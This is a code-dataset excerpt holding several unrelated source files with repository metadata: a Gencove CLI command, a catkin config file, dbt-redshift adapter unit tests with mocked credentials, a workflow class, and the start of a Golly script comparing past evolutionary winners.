2020-04-28T06:31:53.000Z
|
2020-04-28T06:31:53.000Z
|
gencove/command/s3_imports/autoimports/autoimport_list/cli.py
|
gncv/gencove-cli
|
b4bcbe5b6a1506544472542af8b2384d21c7cbe4
|
[
"Apache-2.0"
] | null | null | null |
gencove/command/s3_imports/autoimports/autoimport_list/cli.py
|
gncv/gencove-cli
|
b4bcbe5b6a1506544472542af8b2384d21c7cbe4
|
[
"Apache-2.0"
] | 1
|
2021-07-29T08:24:51.000Z
|
2021-07-29T08:24:51.000Z
|
"""Project autoimport from S3 URI shell command definition.
"""
import click
from gencove.command.common_cli_options import add_options, common_options
from gencove.constants import Credentials, Optionals
from .main import S3AutoImportList
@click.command("list")
@add_options(common_options)
def autoimport_list(
host,
email,
password,
api_key,
):
"""Lists S3 automatic import jobs.
Examples:
List S3 automatic import jobs:
gencove s3 autoimports list
""" # noqa: E501
S3AutoImportList(
Credentials(email=email, password=password, api_key=api_key),
Optionals(host=host),
).run()
| 20.625
| 74
| 0.701515
|
import click
from gencove.command.common_cli_options import add_options, common_options
from gencove.constants import Credentials, Optionals
from .main import S3AutoImportList
@click.command("list")
@add_options(common_options)
def autoimport_list(
host,
email,
password,
api_key,
):
S3AutoImportList(
Credentials(email=email, password=password, api_key=api_key),
Optionals(host=host),
).run()
| true
| true
|
1c3e86a43c2a0d5672cd50f8c9ca4f8573b62144
| 376
|
py
|
Python
|
DiRa_Software/Reference/Source code final 2018-2019/LHU_The_Walker_Digital_race_2019/build/lhucds/detect/thoi_cds/lhu_odometry/catkin_generated/pkg.installspace.context.pc.py
|
lamhoangtung/DiRa
|
6e92f465c0197f3bd60b1e5719c1cc8fa06c5e4c
|
[
"MIT"
] | 34
|
2019-05-07T08:44:27.000Z
|
2020-05-26T13:52:32.000Z
|
DiRa_Software/Reference/Source code final 2018-2019/LHU_The_Walker_Digital_race_2019/build/lhucds/detect/thoi_cds/lhu_odometry/catkin_generated/pkg.installspace.context.pc.py
|
giangnt071098/DiRa
|
71da5c9f13f3fb32d4cc1efd96d981139fb66ee5
|
[
"MIT"
] | 3
|
2019-10-21T04:37:48.000Z
|
2019-11-11T12:16:04.000Z
|
DiRa_Software/Reference/Source code final 2018-2019/LHU_The_Walker_Digital_race_2019/build/lhucds/detect/thoi_cds/lhu_odometry/catkin_generated/pkg.installspace.context.pc.py
|
giangnt071098/DiRa
|
71da5c9f13f3fb32d4cc1efd96d981139fb66ee5
|
[
"MIT"
] | 58
|
2019-03-13T09:15:15.000Z
|
2021-11-19T08:32:27.000Z
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "lhu_odometry"
PROJECT_SPACE_DIR = "/home/nvidia/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
| 41.777778
| 68
| 0.707447
|
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "lhu_odometry"
PROJECT_SPACE_DIR = "/home/nvidia/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
| true
| true
|
1c3e86ef476debf19f99be68c61128b0c63c8b2c
| 14,045
|
py
|
Python
|
tests/unit/test_redshift_adapter.py
|
dlb8685/dbt-redshift
|
c1f02a1931ad6bd9cf0c2eb28bee9bf9e7da3dcf
|
[
"Apache-2.0"
] | 18
|
2021-10-03T09:15:30.000Z
|
2022-03-31T20:32:12.000Z
|
tests/unit/test_redshift_adapter.py
|
dlb8685/dbt-redshift
|
c1f02a1931ad6bd9cf0c2eb28bee9bf9e7da3dcf
|
[
"Apache-2.0"
] | 42
|
2021-10-05T17:03:10.000Z
|
2022-03-31T14:26:25.000Z
|
tests/unit/test_redshift_adapter.py
|
dlb8685/dbt-redshift
|
c1f02a1931ad6bd9cf0c2eb28bee9bf9e7da3dcf
|
[
"Apache-2.0"
] | 10
|
2021-11-02T13:16:26.000Z
|
2022-03-29T07:44:24.000Z
|
import unittest
from unittest import mock
from unittest.mock import Mock
import agate
import boto3
from dbt.adapters.redshift import (
RedshiftAdapter,
Plugin as RedshiftPlugin,
)
from dbt.clients import agate_helper
from dbt.exceptions import FailedToConnectException
from .utils import config_from_parts_or_dicts, mock_connection, TestAdapterConversions, inject_adapter
@classmethod
def fetch_cluster_credentials(*args, **kwargs):
return {
'DbUser': 'root',
'DbPassword': 'tmp_password'
}
class TestRedshiftAdapter(unittest.TestCase):
def setUp(self):
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'pass': 'password',
'port': 5439,
'schema': 'public'
}
},
'target': 'test'
}
project_cfg = {
'name': 'X',
'version': '0.1',
'profile': 'test',
'project-root': '/tmp/dbt/does-not-exist',
'quoting': {
'identifier': False,
'schema': True,
},
'config-version': 2,
}
self.config = config_from_parts_or_dicts(project_cfg, profile_cfg)
self._adapter = None
@property
def adapter(self):
if self._adapter is None:
self._adapter = RedshiftAdapter(self.config)
inject_adapter(self._adapter, RedshiftPlugin)
return self._adapter
def test_implicit_database_conn(self):
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(creds, self.config.credentials)
def test_explicit_database_conn(self):
self.config.method = 'database'
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(creds, self.config.credentials)
def test_explicit_iam_conn(self):
self.config.credentials = self.config.credentials.replace(
method='iam',
cluster_id='my_redshift',
iam_duration_seconds=1200
)
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
expected_creds = self.config.credentials.replace(password='tmp_password')
self.assertEqual(creds, expected_creds)
def test_iam_conn_optionals(self):
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'port': 5439,
'schema': 'public',
'method': 'iam',
'cluster_id': 'my_redshift',
'db_groups': ["my_dbgroup"],
'autocreate': True,
}
},
'target': 'test'
}
config_from_parts_or_dicts(self.config, profile_cfg)
def test_invalid_auth_method(self):
# we have to set method this way, otherwise it won't validate
self.config.credentials.method = 'badmethod'
with self.assertRaises(FailedToConnectException) as context:
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertTrue('badmethod' in context.exception.msg)
def test_invalid_iam_no_cluster_id(self):
self.config.credentials = self.config.credentials.replace(method='iam')
with self.assertRaises(FailedToConnectException) as context:
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertTrue("'cluster_id' must be provided" in context.exception.msg)
def test_default_session_is_not_used_when_iam_used(self):
boto3.DEFAULT_SESSION = Mock()
self.config.credentials = self.config.credentials.replace(method='iam')
self.config.credentials.cluster_id = 'clusterid'
with mock.patch('dbt.adapters.redshift.connections.boto3.Session'):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(boto3.DEFAULT_SESSION.client.call_count, 0,
"The redshift client should not be created using the default session because the session object is not thread-safe")
def test_default_session_is_not_used_when_iam_not_used(self):
boto3.DEFAULT_SESSION = Mock()
self.config.credentials = self.config.credentials.replace(method=None)
with mock.patch('dbt.adapters.redshift.connections.boto3.Session'):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(boto3.DEFAULT_SESSION.client.call_count, 0,
"The redshift client should not be created using the default session because the session object is not thread-safe")
def test_cancel_open_connections_empty(self):
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 0)
def test_cancel_open_connections_master(self):
key = self.adapter.connections.get_thread_identifier()
self.adapter.connections.thread_connections[key] = mock_connection('master')
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 0)
def test_cancel_open_connections_single(self):
master = mock_connection('master')
model = mock_connection('model')
model.handle.get_backend_pid.return_value = 42
key = self.adapter.connections.get_thread_identifier()
self.adapter.connections.thread_connections.update({
key: master,
1: model,
})
with mock.patch.object(self.adapter.connections, 'add_query') as add_query:
query_result = mock.MagicMock()
add_query.return_value = (None, query_result)
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 1)
add_query.assert_called_once_with('select pg_terminate_backend(42)')
master.handle.get_backend_pid.assert_not_called()
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_default_keepalive(self, psycopg2):
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
keepalives_idle=240,
application_name='dbt'
)
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_changed_keepalive(self, psycopg2):
self.config.credentials = self.config.credentials.replace(keepalives_idle=256)
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
keepalives_idle=256,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_search_path(self, psycopg2):
self.config.credentials = self.config.credentials.replace(search_path="test")
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
options="-c search_path=test",
keepalives_idle=240,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_search_path_with_space(self, psycopg2):
self.config.credentials = self.config.credentials.replace(search_path="test test")
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
options=r"-c search_path=test\ test",
keepalives_idle=240,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_set_zero_keepalive(self, psycopg2):
self.config.credentials = self.config.credentials.replace(keepalives_idle=0)
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
application_name='dbt')
def test_dbname_verification_is_case_insensitive(self):
# Override adapter settings from setUp()
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'Redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'pass': 'password',
'port': 5439,
'schema': 'public'
}
},
'target': 'test'
}
project_cfg = {
'name': 'X',
'version': '0.1',
'profile': 'test',
'project-root': '/tmp/dbt/does-not-exist',
'quoting': {
'identifier': False,
'schema': True,
},
'config-version': 2,
}
self.config = config_from_parts_or_dicts(project_cfg, profile_cfg)
self.adapter.cleanup_connections()
self._adapter = RedshiftAdapter(self.config)
self.adapter.verify_database('redshift')
class TestRedshiftAdapterConversions(TestAdapterConversions):
def test_convert_text_type(self):
rows = [
['', 'a1', 'stringval1'],
['', 'a2', 'stringvalasdfasdfasdfa'],
['', 'a3', 'stringval3'],
]
agate_table = self._make_table_of(rows, agate.Text)
expected = ['varchar(64)', 'varchar(2)', 'varchar(22)']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_text_type(agate_table, col_idx) == expect
def test_convert_number_type(self):
rows = [
['', '23.98', '-1'],
['', '12.78', '-2'],
['', '79.41', '-3'],
]
agate_table = self._make_table_of(rows, agate.Number)
expected = ['integer', 'float8', 'integer']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_number_type(agate_table, col_idx) == expect
def test_convert_boolean_type(self):
rows = [
['', 'false', 'true'],
['', 'false', 'false'],
['', 'false', 'true'],
]
agate_table = self._make_table_of(rows, agate.Boolean)
expected = ['boolean', 'boolean', 'boolean']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_boolean_type(agate_table, col_idx) == expect
def test_convert_datetime_type(self):
rows = [
['', '20190101T01:01:01Z', '2019-01-01 01:01:01'],
['', '20190102T01:01:01Z', '2019-01-01 01:01:01'],
['', '20190103T01:01:01Z', '2019-01-01 01:01:01'],
]
agate_table = self._make_table_of(rows, [agate.DateTime, agate_helper.ISODateTime, agate.DateTime])
expected = ['timestamp without time zone', 'timestamp without time zone', 'timestamp without time zone']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_datetime_type(agate_table, col_idx) == expect
def test_convert_date_type(self):
rows = [
['', '2019-01-01', '2019-01-04'],
['', '2019-01-02', '2019-01-04'],
['', '2019-01-03', '2019-01-04'],
]
agate_table = self._make_table_of(rows, agate.Date)
expected = ['date', 'date', 'date']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_date_type(agate_table, col_idx) == expect
def test_convert_time_type(self):
# dbt's default type testers actually don't have a TimeDelta at all.
agate.TimeDelta
rows = [
['', '120s', '10s'],
['', '3m', '11s'],
['', '1h', '12s'],
]
agate_table = self._make_table_of(rows, agate.TimeDelta)
expected = ['varchar(24)', 'varchar(24)', 'varchar(24)']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_time_type(agate_table, col_idx) == expect
# convert_boolean_type
# convert_datetime_type
# convert_date_type
# convert_time_type
| 38.165761
| 146
| 0.61068
|
import unittest
from unittest import mock
from unittest.mock import Mock
import agate
import boto3
from dbt.adapters.redshift import (
RedshiftAdapter,
Plugin as RedshiftPlugin,
)
from dbt.clients import agate_helper
from dbt.exceptions import FailedToConnectException
from .utils import config_from_parts_or_dicts, mock_connection, TestAdapterConversions, inject_adapter
@classmethod
def fetch_cluster_credentials(*args, **kwargs):
return {
'DbUser': 'root',
'DbPassword': 'tmp_password'
}
class TestRedshiftAdapter(unittest.TestCase):
def setUp(self):
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'pass': 'password',
'port': 5439,
'schema': 'public'
}
},
'target': 'test'
}
project_cfg = {
'name': 'X',
'version': '0.1',
'profile': 'test',
'project-root': '/tmp/dbt/does-not-exist',
'quoting': {
'identifier': False,
'schema': True,
},
'config-version': 2,
}
self.config = config_from_parts_or_dicts(project_cfg, profile_cfg)
self._adapter = None
@property
def adapter(self):
if self._adapter is None:
self._adapter = RedshiftAdapter(self.config)
inject_adapter(self._adapter, RedshiftPlugin)
return self._adapter
def test_implicit_database_conn(self):
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(creds, self.config.credentials)
def test_explicit_database_conn(self):
self.config.method = 'database'
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(creds, self.config.credentials)
def test_explicit_iam_conn(self):
self.config.credentials = self.config.credentials.replace(
method='iam',
cluster_id='my_redshift',
iam_duration_seconds=1200
)
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
expected_creds = self.config.credentials.replace(password='tmp_password')
self.assertEqual(creds, expected_creds)
def test_iam_conn_optionals(self):
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'port': 5439,
'schema': 'public',
'method': 'iam',
'cluster_id': 'my_redshift',
'db_groups': ["my_dbgroup"],
'autocreate': True,
}
},
'target': 'test'
}
config_from_parts_or_dicts(self.config, profile_cfg)
def test_invalid_auth_method(self):
self.config.credentials.method = 'badmethod'
with self.assertRaises(FailedToConnectException) as context:
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertTrue('badmethod' in context.exception.msg)
def test_invalid_iam_no_cluster_id(self):
self.config.credentials = self.config.credentials.replace(method='iam')
with self.assertRaises(FailedToConnectException) as context:
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertTrue("'cluster_id' must be provided" in context.exception.msg)
def test_default_session_is_not_used_when_iam_used(self):
boto3.DEFAULT_SESSION = Mock()
self.config.credentials = self.config.credentials.replace(method='iam')
self.config.credentials.cluster_id = 'clusterid'
with mock.patch('dbt.adapters.redshift.connections.boto3.Session'):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(boto3.DEFAULT_SESSION.client.call_count, 0,
"The redshift client should not be created using the default session because the session object is not thread-safe")
def test_default_session_is_not_used_when_iam_not_used(self):
boto3.DEFAULT_SESSION = Mock()
self.config.credentials = self.config.credentials.replace(method=None)
with mock.patch('dbt.adapters.redshift.connections.boto3.Session'):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(boto3.DEFAULT_SESSION.client.call_count, 0,
"The redshift client should not be created using the default session because the session object is not thread-safe")
def test_cancel_open_connections_empty(self):
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 0)
def test_cancel_open_connections_master(self):
key = self.adapter.connections.get_thread_identifier()
self.adapter.connections.thread_connections[key] = mock_connection('master')
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 0)
def test_cancel_open_connections_single(self):
master = mock_connection('master')
model = mock_connection('model')
model.handle.get_backend_pid.return_value = 42
key = self.adapter.connections.get_thread_identifier()
self.adapter.connections.thread_connections.update({
key: master,
1: model,
})
with mock.patch.object(self.adapter.connections, 'add_query') as add_query:
query_result = mock.MagicMock()
add_query.return_value = (None, query_result)
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 1)
add_query.assert_called_once_with('select pg_terminate_backend(42)')
master.handle.get_backend_pid.assert_not_called()
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_default_keepalive(self, psycopg2):
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
keepalives_idle=240,
application_name='dbt'
)
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_changed_keepalive(self, psycopg2):
self.config.credentials = self.config.credentials.replace(keepalives_idle=256)
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
keepalives_idle=256,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_search_path(self, psycopg2):
self.config.credentials = self.config.credentials.replace(search_path="test")
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
options="-c search_path=test",
keepalives_idle=240,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_search_path_with_space(self, psycopg2):
self.config.credentials = self.config.credentials.replace(search_path="test test")
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
options=r"-c search_path=test\ test",
keepalives_idle=240,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_set_zero_keepalive(self, psycopg2):
self.config.credentials = self.config.credentials.replace(keepalives_idle=0)
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
application_name='dbt')
def test_dbname_verification_is_case_insensitive(self):
# Override adapter settings from setUp()
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'Redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'pass': 'password',
'port': 5439,
'schema': 'public'
}
},
'target': 'test'
}
project_cfg = {
'name': 'X',
'version': '0.1',
'profile': 'test',
'project-root': '/tmp/dbt/does-not-exist',
'quoting': {
'identifier': False,
'schema': True,
},
'config-version': 2,
}
self.config = config_from_parts_or_dicts(project_cfg, profile_cfg)
self.adapter.cleanup_connections()
self._adapter = RedshiftAdapter(self.config)
self.adapter.verify_database('redshift')
class TestRedshiftAdapterConversions(TestAdapterConversions):
def test_convert_text_type(self):
rows = [
['', 'a1', 'stringval1'],
['', 'a2', 'stringvalasdfasdfasdfa'],
['', 'a3', 'stringval3'],
]
agate_table = self._make_table_of(rows, agate.Text)
expected = ['varchar(64)', 'varchar(2)', 'varchar(22)']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_text_type(agate_table, col_idx) == expect
def test_convert_number_type(self):
rows = [
['', '23.98', '-1'],
['', '12.78', '-2'],
['', '79.41', '-3'],
]
agate_table = self._make_table_of(rows, agate.Number)
expected = ['integer', 'float8', 'integer']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_number_type(agate_table, col_idx) == expect
def test_convert_boolean_type(self):
rows = [
['', 'false', 'true'],
['', 'false', 'false'],
['', 'false', 'true'],
]
agate_table = self._make_table_of(rows, agate.Boolean)
expected = ['boolean', 'boolean', 'boolean']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_boolean_type(agate_table, col_idx) == expect
def test_convert_datetime_type(self):
rows = [
['', '20190101T01:01:01Z', '2019-01-01 01:01:01'],
['', '20190102T01:01:01Z', '2019-01-01 01:01:01'],
['', '20190103T01:01:01Z', '2019-01-01 01:01:01'],
]
agate_table = self._make_table_of(rows, [agate.DateTime, agate_helper.ISODateTime, agate.DateTime])
expected = ['timestamp without time zone', 'timestamp without time zone', 'timestamp without time zone']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_datetime_type(agate_table, col_idx) == expect
def test_convert_date_type(self):
rows = [
['', '2019-01-01', '2019-01-04'],
['', '2019-01-02', '2019-01-04'],
['', '2019-01-03', '2019-01-04'],
]
agate_table = self._make_table_of(rows, agate.Date)
expected = ['date', 'date', 'date']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_date_type(agate_table, col_idx) == expect
def test_convert_time_type(self):
# dbt's default type testers actually don't have a TimeDelta at all.
agate.TimeDelta
rows = [
['', '120s', '10s'],
['', '3m', '11s'],
['', '1h', '12s'],
]
agate_table = self._make_table_of(rows, agate.TimeDelta)
expected = ['varchar(24)', 'varchar(24)', 'varchar(24)']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_time_type(agate_table, col_idx) == expect
# convert_boolean_type
# convert_datetime_type
# convert_date_type
# convert_time_type
| true
| true
|
1c3e877201199503869f4cb34966b4d0ec86b3f6
| 277
|
py
|
Python
|
src/workflow/configuration/workflow_configuration.py
|
piotr-kalanski/service-initializer
|
1662f9cfce1d7185129063f61d9e4fbd10ec8567
|
[
"Apache-2.0"
] | 1
|
2020-04-17T10:46:48.000Z
|
2020-04-17T10:46:48.000Z
|
src/workflow/configuration/workflow_configuration.py
|
piotr-kalanski/service-initializer
|
1662f9cfce1d7185129063f61d9e4fbd10ec8567
|
[
"Apache-2.0"
] | 19
|
2020-03-17T18:40:58.000Z
|
2020-03-24T18:35:36.000Z
|
src/workflow/configuration/workflow_configuration.py
|
piotr-kalanski/service-initializer
|
1662f9cfce1d7185129063f61d9e4fbd10ec8567
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
from workflow.step import Step
class WorkflowConfiguration:
def __init__(self):
self._steps = []
def add_step(self, step: Step):
self._steps.append(step)
def get_steps(self) -> List[Step]:
return self._steps
| 18.466667
| 38
| 0.649819
|
from typing import List
from workflow.step import Step
class WorkflowConfiguration:
def __init__(self):
self._steps = []
def add_step(self, step: Step):
self._steps.append(step)
def get_steps(self) -> List[Step]:
return self._steps
| true
| true
|
1c3e87792f7fd7fb2a6073e2de754f523bdd4629
| 4,719
|
py
|
Python
|
compare_past_winners.py
|
pdturney/modeling-symbiosis
|
54e17f6619475b4678425d916ca8142e214040f0
|
[
"MIT"
] | null | null | null |
compare_past_winners.py
|
pdturney/modeling-symbiosis
|
54e17f6619475b4678425d916ca8142e214040f0
|
[
"MIT"
] | null | null | null |
compare_past_winners.py
|
pdturney/modeling-symbiosis
|
54e17f6619475b4678425d916ca8142e214040f0
|
[
"MIT"
] | null | null | null |
#
# Compare Past Winners
#
# Peter Turney, February 13, 2020
#
# Compare the top seed in generation N with the top seed
# from every preceding generation.
#
import golly as g
import model_classes as mclass
import model_functions as mfunc
import model_parameters as mparam
import numpy as np
import pickle
import os
import re
import sys
#
# Initialize some parameters from model_parameters
#
pickle_dir = mparam.log_directory
analysis_dir = mparam.log_directory
num_generations = mparam.num_generations
width_factor = mparam.width_factor
height_factor = mparam.height_factor
time_factor = mparam.time_factor
#
# Initialize some parameters locally
#
# each pair of seeds will have this many contests
num_trials = 50
#
# Stats analysis file
#
basename = os.path.basename(os.path.normpath(analysis_dir))
analysis_path = analysis_dir + "/compare-past-winners-" + \
basename + ".tsv"
analysis_handle = open(analysis_path, "w", 0)
#
# Print out a header for the result file
#
mfunc.show_message(g, analysis_handle, "\n\nCompare Winners\n\n")
mfunc.show_message(g, analysis_handle, "width_factor = " + \
str(width_factor) + "\n")
mfunc.show_message(g, analysis_handle, "height_factor = " + \
str(height_factor) + "\n")
mfunc.show_message(g, analysis_handle, "time_factor = " + \
str(time_factor) + "\n")
mfunc.show_message(g, analysis_handle, "num_trials = " + \
str(num_trials) + "\n")
mfunc.show_message(g, analysis_handle, "path = " + \
str(pickle_dir) + "\n\n")
mfunc.show_message(g, analysis_handle, \
"Note the results will change slightly each time this runs.\n\n")
#
# Make a list of the pickles in pickle_dir
#
# We assume that the directory pickle_dir contains the pickles from
# only one single run of Model-T. That is, all of the pickles will
# have the same date and time stamp as part of their file names.
#
pickle_list = []
for file in os.listdir(pickle_dir):
if file.endswith(".bin"):
pickle_list.append(file)
#
assert len(pickle_list) == num_generations + 1
#
# Extract the base part of the pickles. Assume that all of the
# pickles have the same base part.
#
# "log-2019-11-15-14h-22m-30s-pickle-21.bin" -- full file name
# --> "log-2019-11-15-14h-22m-30s-pickle-" -- base part of name
#
pickle_base_search = re.search(r'(log-.+\d\ds-pickle-)', pickle_list[0])
pickle_base = pickle_base_search.group(1)
#
# Make a list of the winning seed for each generation
#
winning_seeds = []
for pickle_num in range(num_generations + 1):
pickle_name = pickle_base + str(pickle_num) + ".bin"
pickle_path = pickle_dir + "/" + pickle_name
pickle_handle = open(pickle_path, "rb") # rb = read binary
pickle_data = pickle.load(pickle_handle)
pickle_handle.close()
# seeds are sorted in order of decreasing score, so the
# first seed is the winning seed for this pickle
winning_seed = pickle_data[0]
winning_seeds.append(winning_seed)
#
# Calculate the score for each winning seed by comparing
# it with the preceding seeds. Let's say that the first
# seed (generation 0) has a fitness of zero. This is
# reasonable, since the first seed is randomly generated
# and there is no earlier generation we can compare it to.
#
for new_seed_num in range(num_generations + 1):
# if this is the first seed, then its score is zero ...
if (new_seed_num == 0):
new_seed_score = 0
mfunc.show_message(g, analysis_handle,
str(new_seed_num) + "\t" + str(new_seed_score) + "\n")
# if this is not the first seed ...
else:
new_seed = winning_seeds[new_seed_num]
# initialize sum of scores
new_seed_score = 0
# compare all the old winners to new_seed
for old_seed_num in range(new_seed_num):
old_seed = winning_seeds[old_seed_num]
# new_score will range from 0 to 1
# - new_score is the fraction of the trials that
# are won by new_seed
[old_score, new_score] = mfunc.score_pair(g, \
old_seed, new_seed, width_factor, height_factor, \
time_factor, num_trials)
# increment the sum of scores, new_seed_score, by new_score
# - increment ranges from 0 to 1
new_seed_score = new_seed_score + new_score
# now new_seed_score ranges from 0 to new_seed_num
# - lets adjust new_seed_score to range from
# -new_seed_num to +new_seed_num
new_seed_score = (2 * new_seed_score) - new_seed_num
# write result to output file
mfunc.show_message(g, analysis_handle,
str(new_seed_num) + "\t" + str(new_seed_score) + "\n")
#
#
#
# Final message
#
mfunc.show_message(g, analysis_handle, "\nAnalysis complete.\n")
analysis_handle.close()
#
#
| 34.698529
| 73
| 0.700996
|
import golly as g
import model_classes as mclass
import model_functions as mfunc
import model_parameters as mparam
import numpy as np
import pickle
import os
import re
import sys
pickle_dir = mparam.log_directory
analysis_dir = mparam.log_directory
num_generations = mparam.num_generations
width_factor = mparam.width_factor
height_factor = mparam.height_factor
time_factor = mparam.time_factor
num_trials = 50
basename = os.path.basename(os.path.normpath(analysis_dir))
analysis_path = analysis_dir + "/compare-past-winners-" + \
basename + ".tsv"
analysis_handle = open(analysis_path, "w", 0)
mfunc.show_message(g, analysis_handle, "\n\nCompare Winners\n\n")
mfunc.show_message(g, analysis_handle, "width_factor = " + \
str(width_factor) + "\n")
mfunc.show_message(g, analysis_handle, "height_factor = " + \
str(height_factor) + "\n")
mfunc.show_message(g, analysis_handle, "time_factor = " + \
str(time_factor) + "\n")
